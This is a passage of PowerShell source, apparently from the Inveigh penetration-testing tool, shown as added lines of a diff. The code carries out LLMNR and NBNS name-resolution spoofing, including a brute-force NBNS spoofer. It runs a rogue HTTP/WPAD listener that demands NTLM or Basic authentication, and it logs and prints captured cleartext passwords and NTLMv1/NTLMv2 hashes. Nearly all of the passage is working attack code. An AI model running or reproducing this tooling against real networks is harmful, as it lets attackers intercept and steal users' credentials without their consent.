$HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a + + $HTTP_WWW_authenticate_header + + $NTLM + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + + } + elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) + { + $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") + $HTTP_message_bytes = 0x0d,0x0a + $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a + + $HTTP_WWW_authenticate_header + + $Basic + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + + } + else + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_message_bytes = 0x0d,0x0a + $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + } + + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + Start-Sleep -m 10 + $HTTP_request_raw_URL_old = $HTTP_request_raw_URL + $HTTP_client_handle_old = $HTTP_client.Client.Handle + + if($HTTP_client_close) + { + $HTTP_client.Close() + + if($RunCount -gt 0 -and ($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)) + { + $HTTP_listener.Stop() + $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run count at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")]) + $inveigh.unprivileged_running = $false + break HTTP_listener_loop + } + + } + + } + else + { + $HTTP_client.Close() + $HTTP_client_close = $true + } + + } + + $HTTP_client.Close() + start-sleep -s 1 + $HTTP_listener.Server.blocking = $false + Start-Sleep -s 1 + $HTTP_listener.Server.Close() + Start-Sleep -s 1 + $HTTP_listener.Stop() +} + +$LLMNR_spoofer_scriptblock = +{ + param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + + $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + + while($inveigh.unprivileged_running) + { + $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async + + if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now + { + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) + + $LLMNR_response_packet = $LLMNR_request_data[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)]) + $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString + + if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port) + $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_response_message = "- response sent" + } + else + { + + if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $LLMNR_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $LLMNR_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $LLMNR_response_message = "- previous capture from $source_IP" + } + else + { + $LLMNR_response_message = "- something went wrong" + } + + } + + if($LLMNR_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + } + + $LLMNR_request_data = "" + } + + } + + $LLMNR_UDP_client.Close() + } + +$NBNS_spoofer_scriptblock = +{ + param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL) + + $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + + while($inveigh.unprivileged_running) + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async + + if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') + { + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + $NBNS_response_packet = $NBNS_request_data[0,1] + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $NBNS_request_data[13..$NBNS_request_data.Length] + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $source_IP = $NBNS_listener_endpoint.Address.IPAddressToString + $NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44]) + + switch ($NBNS_query_type) + { + + '41-41' + { + $NBNS_query_type = "00" + } + + '41-44' + { + $NBNS_query_type = "03" + } + + '43-41' + { + $NBNS_query_type = "20" + } + + '42-4C' + { + $NBNS_query_type = "1B" + } + + '42-4D' + { + $NBNS_query_type = "1C" + } + + '42-4E' + { + $NBNS_query_type = "1D" + } + + '42-4F' + { + $NBNS_query_type = "1E" + } + + } + + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + $n = 0 + + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + + if (($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type)) + { + $NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137) + $NBNS_UDP_client.Connect($NBNS_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_response_message = "- response sent" + } + else + { + + if($NBNSTypes -notcontains $NBNS_query_type) + { + $NBNS_response_message = "- disabled NBNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $NBNS_response_message = "- previous capture from $source_IP" + } + else + { + $NBNS_response_message = "- something went wrong" + } + + } + + if($NBNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + } + + $NBNS_request_data = "" + } + + } + + $NBNS_UDP_client.Close() + } + +$NBNS_bruteforce_spoofer_scriptblock = +{ + param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL) + + $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper() + + $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost) + $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) + $hostname_encoded = $hostname_encoded.Replace("-","") + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + for($i=0; $i -lt $hostname_encoded.Count; $i++) + { + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + + } + + $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")]) + $NBNS_paused = $false + $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137) + $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget) + $destination_point = New-Object Net.IPEndpoint($destination_IP,137) + $NBNS_bruteforce_UDP_client.Connect($destination_point) + + while($inveigh.unprivileged_running) + { + + :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.unprivileged_running) + { + + if($NBNS_paused) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")]) + $NBNS_paused = $false + } + + for ($i = 0; $i -lt 255; $i++) + { + + for ($j = 0; $j -lt 255; $j++) + { + $NBNS_response_packet[0] = $i + $NBNS_response_packet[1] = $j + $NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length) + + if($inveigh.hostname_spoof -and $NBNSBruteForcePause) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")]) + $NBNS_paused = $true + break NBNS_spoofer_loop + } + + } + + } + + } + + Start-Sleep -m 5 + } + + $NBNS_bruteforce_UDP_client.Close() + } + +$control_unprivileged_scriptblock = +{ + param ($NBNSBruteForcePause,$RunTime) + + if($RunTime) + { + $control_timeout = New-TimeSpan -Minutes $RunTime + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + if($NBNSBruteForcePause) + { + $NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause + } + + while ($inveigh.unprivileged_running) + { + + if($RunTime) + { + + if($control_stopwatch.Elapsed -ge $control_timeout) + { + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited due to run time")]) + Start-Sleep -m 5 + $inveigh.unprivileged_running = $false + } + + if($inveigh.relay_running) + { + $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) + Start-Sleep -m 5 + $inveigh.relay_running = $false + } + + if($inveigh.running) + { + $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) + Start-Sleep -m 5 + $inveigh.running = $false + } + + } + } + + if($NBNSBruteForcePause -and $inveigh.hostname_spoof) + { + + if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause) + { + $inveigh.hostname_spoof = $false + } + + } + + if($inveigh.file_output -and !$inveigh.running) + { + + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveAt(0) + } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveAt(0) + } + + } + + Start-Sleep -m 5 + } + } + +# End ScriptBlocks +# Begin Startup functions + +# HTTP Listener Startup function +function HTTPListener() +{ + $HTTP_runspace = [RunspaceFactory]::CreateRunspace() + $HTTP_runspace.Open() + $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTP_powershell = [PowerShell]::Create() + $HTTP_powershell.Runspace = $HTTP_runspace + $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPIP).AddArgument($HTTPPort).Addargument($HTTPResponse).AddArgument( + $NBNSBruteForcePause).AddArgument($WPADAuth).AddArgument($WPADEmptyFile).AddArgument($WPADIP).AddArgument( + $WPADPort).AddArgument($WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null + $HTTP_powershell.BeginInvoke() > $null +} + +# LLMNR Spoofer Startup function +function LLMNRSpoofer() +{ + $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $LLMNR_spoofer_runspace.Open() + $LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $LLMNR_spoofer_powershell = [PowerShell]::Create() + $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace + $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument( + $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $LLMNRTTL) > $null + $LLMNR_spoofer_powershell.BeginInvoke() > $null +} + +# NBNS Spoofer Startup function +function NBNSSpoofer() +{ + $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_spoofer_runspace.Open() + $NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_spoofer_powershell = [PowerShell]::Create() + $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace + $NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($NBNS_response_message).AddArgument( + $SpooferIP).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $NBNSTTL) > $null + $NBNS_spoofer_powershell.BeginInvoke() > $null +} + +# Spoofer Startup function +function NBNSBruteForceSpoofer() +{ + $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_bruteforce_spoofer_runspace.Open() + $NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create() + $NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace + $NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument( + $SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument( + $NBNSBruteForcePause).AddArgument($NBNSTTL) > $null + $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null +} + +# Control Unprivileged Startup function +function ControlUnprivilegedLoop() +{ + $control_unprivileged_runspace = [RunspaceFactory]::CreateRunspace() + $control_unprivileged_runspace.Open() + $control_unprivileged_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $control_unprivileged_powershell = [PowerShell]::Create() + $control_unprivileged_powershell.Runspace = $control_unprivileged_runspace + $control_unprivileged_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $control_unprivileged_powershell.AddScript($control_unprivileged_scriptblock).AddArgument( + $NBNSBruteForcePause).AddArgument($RunTime) > $null + $control_unprivileged_powershell.BeginInvoke() > $null +} + +# End Startup functions + +# Startup Enabled Services + +# HTTP Server Start +if($HTTP -eq 'Y') +{ + HTTPListener +} + +# LLMNR Spoofer Start +if($LLMNR -eq 'Y') +{ + LLMNRSpoofer +} + +# NBNS Spoofer Start +if($NBNS -eq 'Y') +{ + NBNSSpoofer +} + +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + +# Control Unprivileged Loop Start +if($NBNSBruteForcePause -or $RunTime -or $inveigh.file_output) +{ + ControlUnprivilegedLoop +} + +if($inveigh.console_output) +{ + + if($ConsoleStatus) + { + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + :console_loop while(($inveigh.unprivileged_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + + if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) + { + + if($inveigh.cleartext_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) + $inveigh.cleartext_list.Sort() + + foreach($unique_cleartext in $inveigh.cleartext_list) + { + if($unique_cleartext -ne $unique_cleartext_last) + { + Write-Output($unique_cleartext + $inveigh.newline) + } + + $unique_cleartext_last = $unique_cleartext + } + + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) + } + + if($inveigh.NTLMv1_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv1_list.Sort() + + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output($unique_NTLMv1 + $inveigh.newline) + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + + $unique_NTLMv1_account_last = "" + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + { + Write-Output($NTLMv1_username + $inveigh.newline) + } + + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) + } + + if($inveigh.NTLMv2_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv2_list.Sort() + + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output($unique_NTLMv2 + $inveigh.newline) + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + + $unique_NTLMv2_account_last = "" + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + { + Write-Output($NTLMv2_username + $inveigh.newline) + } + + } + else + { + Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) + } + + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + + } + + if($inveigh.console_input) + { + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + } + + Start-Sleep -s 1 + } + +} + +if($inveigh.file_output -and !$inveigh.running) +{ + + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveAt(0) + } + + 